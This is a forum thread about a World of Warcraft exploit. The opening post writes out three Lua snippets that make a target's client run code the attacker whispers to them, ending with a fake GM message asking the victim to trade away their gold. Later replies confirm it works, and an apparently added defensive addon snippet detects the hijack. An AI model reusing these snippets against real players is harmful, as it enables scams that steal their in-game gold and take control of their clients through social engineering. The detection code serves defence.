Run arbitrary LUA scripts on another WoW client.

  1. #1
    Hazzbazzy

    Run arbitrary LUA scripts on another WoW client.

    Hi all,

    As the title states, this is an extremely malicious way to interact with another user; using this, you can make a target trade all their gold away, send mail, and basically perform any form of LUA function. The exploit is caused by an "oversight" at Blizzard, and it does not require any add-ons. Three bits of code are effectively required in order to run arbitrary code on a target's WoW, and the target is required to run one of these commands.

    The first command:
    Code:
    /run RemoveExtraSpaces=RunScript
    This is the command you have to get the target to run; it replaces the vanilla chat API "RemoveExtraSpaces" (which is activated whenever you receive a chat message) with the RunScript API (the API partly responsible for running LUA scripts).

    The second "command":
    Code:
    z=z or CreateFrame('button')z:RegisterEvent'CHAT_MSG_ADDON'z:SetScript('OnEvent',function(_,_,_,m)pcall(loadstring(m))end)RegisterAddonMessagePrefix"Fr"
    After the target has run the command, they will no longer be able to see chat messages, unless they are chat messages that you specifically create for them. This second bit of code is actually just whispered to the target (due to the "RemoveExtraSpaces="), and registers an Addon prefix so that you can send messages to the target across the "CHAT_MSG_ADDON" channel, which again, does not appear to the target.

    The third (example) "command":
    Code:
    SendAddonMessage("Fr", RemoveExtraSpaces (ChatFrame1:AddMessage("\124cff00B4FF\124TInterface\\CHATFRAME\\UI-ChatIcon-Blizz.bmp:12:24:0:0\124t\124h[Latin]: Hi, please trade me all your gold\124r")), "WHISPER", "Reassurance-Rexxar")
    This third piece of code is the "do this" part, and again whispered to the target. It works by sending a message to the target, which is then identified as if it's been written after the /run command, again due to the first command we had the target run. While it still appears as a message, whatever function you set in the message, the target will perform.

    For example, the example I have provided sends a message to "Reassurance-Rexxar", and sends a command across the CHAT_MSG_ADDON channel to print a fake message on the target's screen, reading <GMICON>[Latin]: hi, please trade me all your gold. Obviously, the
    Code:
    ChatFrame1:AddMessage("\124cff00B4FF\124TInterface\\CHATFRAME\\UI-ChatIcon-Blizz.bmp:12:24:0:0\124t\124h[Latin]: Hi, please trade me all your gold\124r")
    part can be changed to anything you want, such as having the target perform an emote, or say something random in guild chat.


    Thanks all,

    Edit: this appears to be partially, if not completely, fixed; I can no longer seem to send the second string of code to another player, as the message just does not send. Could be down to this:

    Last edited by Hazzbazzy; 07-07-2016 at 06:31 PM.
    "HOLY TIME MACHINE BATMAN! it's 1973!"
    https://youtube.com/Hazzbazzy

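An added defensive example, not code from this thread or from any addon the posters mention: an addon snippet that detects the hijack the OP describes (the global RemoveExtraSpaces no longer pointing at the vanilla function) and flags incoming chat that asks the player to run the bait command. The addon label "ChatGuard" and the one-second check interval are my own assumptions.

```lua
-- ChatGuard (assumed name): defensive addon snippet against the
-- "RemoveExtraSpaces=RunScript" hijack discussed in this thread.
-- Loads as an ordinary WoW addon; nothing here is from the original post.

-- Capture the vanilla function at load time so we can tell later
-- whether the global has been reassigned.
local origRemoveExtraSpaces = RemoveExtraSpaces

-- Bait pattern the scam relies on: a chat message telling the player to
-- reassign RemoveExtraSpaces via /run. Matched case-insensitively.
local BAIT = "removeextraspaces%s*="

local function warn(text)
    print("|cffff0000[ChatGuard]|r " .. text)
end

-- 1. Annotate (never hide) incoming chat that carries the bait, so the
--    player sees a warning next to the message itself.
local function baitFilter(_, _, msg, author, ...)
    if type(msg) == "string" and msg:lower():find(BAIT) then
        warn("Message from " .. tostring(author) ..
             " asks you to run a /run command. Do not paste it.")
    end
    return false, msg, author, ...
end
for _, event in ipairs({ "CHAT_MSG_WHISPER", "CHAT_MSG_SAY",
                         "CHAT_MSG_YELL", "CHAT_MSG_CHANNEL" }) do
    ChatFrame_AddMessageEventFilter(event, baitFilter)
end

-- 2. Once the global is hijacked, every incoming message runs as code, so
--    poll the global and restore it. Any replacement, not only RunScript,
--    is treated as suspicious.
local function checkHijack()
    if RemoveExtraSpaces ~= origRemoveExtraSpaces then
        RemoveExtraSpaces = origRemoveExtraSpaces
        warn("RemoveExtraSpaces had been replaced and was restored. " ..
             "Type /reload to be safe.")
    end
end
C_Timer.NewTicker(1, checkHijack)
```

Restoring the global is what stops further whispers from being executed; as a later reply notes, a client with all addons disabled has nothing like this running, so the check only helps while the addon is loaded.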
  3. #2
    Kaizuken


    Originally Posted by Hazzbazzy

    Haha, how can you discover things like that?
    Nice find.
    And how can you reach the GM Island?

  4. #3
    Hazzbazzy
    Originally Posted by Kaizuken
    Haha, how can you discover things like that?
    Nice find.
    And how can you reach the GM Island?
    Been at GM Island since WOTLK on my level 60; summoned my level 1 there with RAF for "reassurance".

    I found this by investigating a scam that's going round and then working out how they were managing it.
    "HOLY TIME MACHINE BATMAN! it's 1973!"
    https://youtube.com/Hazzbazzy

  5. #4
    Alfalfa
    Nice find, +rep!

  7. #5
    krampak
    I got those "You have been disconnected from the chat server" messages yesterday. Does this mean that someone was trying to do such a thing?

  8. #6
    Hazzbazzy
    Originally Posted by krampak
    I got those "You have been disconnected from the chat server" messages yesterday. Does this mean that someone was trying to do such a thing?
    No, I think it was Blizzard implementing a ninja hotfix for this.
    "HOLY TIME MACHINE BATMAN! it's 1973!"
    https://youtube.com/Hazzbazzy

  9. #7
    Android32
    Wait, so we have a Blizzard GM on the forums who figures out exploits and posts them here?

  10. #8
    Aeon1c
    Epic find! +Rep

  11. #9
    Bitninja
    Thanks mate!

  12. #10
    Hanss
    Well done reverse engineering this hack. Interesting read!

  13. #11
    Hazzbazzy
    Originally Posted by Android32
    Wait, so we have a Blizzard GM on the forums who figures out exploits and posts them here?
    No, I'm not a GM.
    "HOLY TIME MACHINE BATMAN! it's 1973!"
    https://youtube.com/Hazzbazzy

  14. #12
    solor
    I tried a few days ago and replaced loadstring with print to get more info on exactly what the "hacker" sends you; however, it didn't work for some reason, so I only ended up reporting him after playing dumb for ~10 min while he was desperately trying to teach me how to run that /run command. At the end I also explained to him how the exploit works, since he seemed to be clueless. What I think is that "someone" wrote a whole addon for this and made a guide that is getting sold, and now "script kiddies" are using it, because it's always the same "back" story, like someone following a guide. I saw him on at least 3 different EU servers, same crap every time.

  15. #13
    Tubleros
    It works. When I tried it the first time, nothing happened with the target. But when the other client disabled all the addons, it worked just fine. So the target had some sort of addon activated that prevented the script from getting through.

  16. #14
    Hazzbazzy
    Originally Posted by Tubleros
    It works. When I tried it the first time, nothing happened with the target. But when the other client disabled all the addons, it worked just fine. So the target had some sort of addon activated that prevented the script from getting through.
    Thanks for confirming, will look at attempting this again momentarily; perhaps it was a temporary fix.

    Edit: are you on US or EU realms, as I still can't get it to work on the EU side?
    Last edited by Hazzbazzy; 07-09-2016 at 01:29 PM.
    "HOLY TIME MACHINE BATMAN! it's 1973!"
    https://youtube.com/Hazzbazzy

  17. #15
    Tubleros
    Originally Posted by Hazzbazzy
    Thanks for confirming, will look at attempting this again momentarily; perhaps it was a temporary fix.

    Edit: are you on US or EU realms, as I still can't get it to work on the EU side?
    I'm on the EU realms.
